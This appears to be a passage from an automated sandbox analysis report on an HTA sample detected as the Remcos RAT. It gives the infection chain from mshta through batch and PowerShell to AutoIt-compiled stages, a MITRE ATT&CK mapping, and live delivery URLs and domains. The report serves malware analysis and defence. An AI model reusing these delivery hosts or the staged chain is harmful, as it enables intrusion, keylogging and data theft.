    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CCE5F4 GetLocalTime,38_2_00CCE5F4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CCE652 GetUserNameW,38_2_00CCE652
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CABCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,38_2_00CABCD2
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,13_2_00406805
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: LinkHub.com | Binary or memory string: WIN_81
Source: LinkHub.com | Binary or memory string: WIN_XP
Source: LinkHub.com.30.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: LinkHub.com | Binary or memory string: WIN_XPe
Source: LinkHub.com | Binary or memory string: WIN_VISTA
Source: LinkHub.com | Binary or memory string: WIN_7
Source: LinkHub.com | Binary or memory string: WIN_8

Note on the WIN_* strings: they sit in the same string table as @GUI_DRAGID, the GUICtrl command names (ISVISIBLE, ADDSTRING, ...) and the msctls_* control classes, and the memory-string URL table below lists autoitscript.com/autoit3/ for Propose.com and LinkHub.com. That is the string table of the AutoIt3 runtime: both dropped stages are AutoIt-compiled wrappers, so these strings identify the interpreter rather than a bespoke OS-version check by the payload. The substantive indicator in this section is the Yara hit on the keylogger output C:\ProgramData\remcos\logs.dat.

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3QMI88
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CF2263 socket, WSAGetLastError, bind, WSAGetLastError, closesocket, 38_2_00CF2263
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CF1C61 socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket, 38_2_00CF1C61
MITRE ATT&CK matrix (flattened from the original 14-column table; each tactic is listed with its techniques in row order. A number in front of a technique is the signature-hit badge shown in the original matrix; techniques without a number were not flagged.)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Windows Management Instrumentation; 1 Native API; 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 111 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 12 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 111 Masquerading; 2 Valid Accounts; 121 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 12 Process Injection
Credential Access: 121 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 28 System Information Discovery; 121 Security Software Discovery; 121 Virtualization/Sandbox Evasion; 4 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Email Collection; 121 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1585493, sample c2.hta, start date 07/01/2025, architecture WINDOWS, score 100), rendered as a process tree from the original graph. Bracketed numbers are the node badges from the graph; "..." in paths is as shown in the report.

Root: c2.hta
  DNS/IP: ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF; x1.i.lencr.org; 5 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Yara detected Remcos RAT; 12 other signatures
  +-- mshta.exe [17]
  |     contacts files.catbox.moe (108.181.20.35:443, local port 49731, ASN852CA, Canada)
  |     drops C:\Users\user\AppData\Local\Temp\temp.bat (Unicode); C:\Users\user\AppData\Local\...\0o8vth[1].bat (Unicode)
  |     +-- cmd.exe [3 2]
  |     |     signatures: Suspicious powershell command line found; Drops PE files with a suspicious file extension; Uses schtasks.exe or at.exe to add and modify task schedules
  |     |     +-- powershell.exe [15 16]
  |     |     |     contacts myguyapp.com (193.26.115.39:443, local ports 49735 and 49738, QUICKPACKETUS, Netherlands)
  |     |     |     drops C:\Users\user\Downloads\W2.pdf (PDF)
  |     |     |     signature: Powershell drops PE file
  |     |     +-- powershell.exe
  |     |     |     drops C:\Users\user\AppData\Local\...\msword.exe (PE32)
  |     |     |     signature: Loading BitLocker PowerShell Module
  |     |     +-- msword.exe
  |     |     |     +-- cmd.exe
  |     |     |           drops C:\Users\user\AppData\Local\...\Propose.com (PE32)
  |     |     |           +-- Propose.com
  |     |     |           |     contacts geoplugin.net (178.237.33.50:80, local port 49758, ATOM86-ASATOM86NL, Netherlands)
  |     |     |           |     drops C:\Users\user\AppData\Local\...\LinkHub.com (PE32); C:\Users\user\AppData\Local\...\LinkHub.js (ASCII); C:\ProgramData\remcos\logs.dat (data)
  |     |     |           |     signatures: Detected Remcos RAT; Drops PE files with a suspicious file extension; Installs a global keyboard hook
  |     |     |           |     +-- cmd.exe
  |     |     |           |     |     drops C:\Users\user\AppData\Roaming\...\LinkHub.url (MS)
  |     |     |           |     |     +-- conhost.exe
  |     |     |           |     +-- cmd.exe
  |     |     |           |           +-- conhost.exe
  |     |     |           |           +-- schtasks.exe
  |     |     |           +-- conhost.exe
  |     |     |           +-- tasklist.exe
  |     |     |           +-- 9 other processes
  |     |     +-- 3 other processes
  |     |           drop C:\Users\user\AppData\Local\Temp\msword.zip (Zip)
  |     |           +-- AcroCEF.exe [107]
  |     |                 +-- AcroCEF.exe
  |     +-- cmd.exe
  |           +-- conhost.exe
  |           +-- timeout.exe
  +-- wscript.exe
  |     signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  |     +-- LinkHub.com
  +-- wscript.exe
        +-- LinkHub.com

Source | Detection | Scanner | Label
c2.hta | 3% | ReversingLabs |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\msword\msword.exe | 8% | ReversingLabs |
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://myguyapp.com/W2.pdfD | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipK | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zip7 | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipF | 0% | Avira URL Cloud | safe
https://files.catbox.moe; | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipiZ | 0% | Avira URL Cloud | safe
https://myguyapp.com/W2.pdf | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zip. | 100% | Avira URL Cloud | malware
https://files.catbl | 0% | Avira URL Cloud | safe
https://myguyapp.com/W2.pdf&vO | 0% | Avira URL Cloud | safe
https://files.catbox | 0% | Avira URL Cloud | safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
files.catbox.moe | 108.181.20.35 | true | false | | high
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
geoplugin.net | 178.237.33.50 | true | false | | high
me-work.com | 193.26.115.39 | true | false | | high
myguyapp.com | 193.26.115.39 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://myguyapp.com/msword.zip | false | | high
http://geoplugin.net/json.gp | false | | high
https://myguyapp.com/W2.pdf | true | Avira URL Cloud: safe | unknown
https://files.catbox.moe/0o8vth.bat | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://files.catbox.moe/0o8vth.batC | mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.7.dr | false | | high
https://myguyapp.com/msword.zip7 | tasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zip. | tasklist.exe, 00000013.00000002.1897227873.0000000000D48000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://myguyapp.com/msword.zipK | tasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/X | Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001E.00000000.1919152978.0000000000D25000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000000.1944526047.0000000000D45000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com, 00000028.00000002.2070151475.0000000000D45000.00000002.00000001.01000000.00000011.sdmp, Clinton.26.dr, Propose.com.17.dr, LinkHub.com.30.dr | false | | high
https://files.catbox.moe/ | mshta.exe, 00000000.00000003.1843154558.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858235674.000000000314E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1848250807.0000000003214000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845396099.000000000320C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858635359.0000000003216000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | msword.exe, 0000000D.00000000.1841551557.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.11.dr | false | | high
https://myguyapp.com/msword.zipF | cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP | cmd.exe, 00000023.00000002.1928219562.00000000030E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | false | | high
https://myguyapp.com/msword.zipiZ | msword.exe, 0000000D.00000002.1869277410.000000000087E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/W2.pdfD | cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://files.catbox.moe; | mshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://files.catbl | mshta.exe, 00000000.00000003.1843566389.000000000A863000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859438756.000000000A863000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://files.catbox.moe/0o8vth.bat_ | mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://files.catbox.moe/p | mshta.exe, 00000000.00000002.1858235674.000000000314E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://files.catbox | mshta.exe, 00000000.00000003.1843566389.000000000A863000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856565051.000000000A8A1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf | Propose.com, 0000001E.00000003.1925118973.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925065278.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926628658.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924979857.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924940162.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925001537.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926572699.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925043539.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924959596.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925023697.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926599427.0000000000E95000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://files.catbox.moe | mshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://files.catbox.moe/0o8vth.battH | mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | false | | high
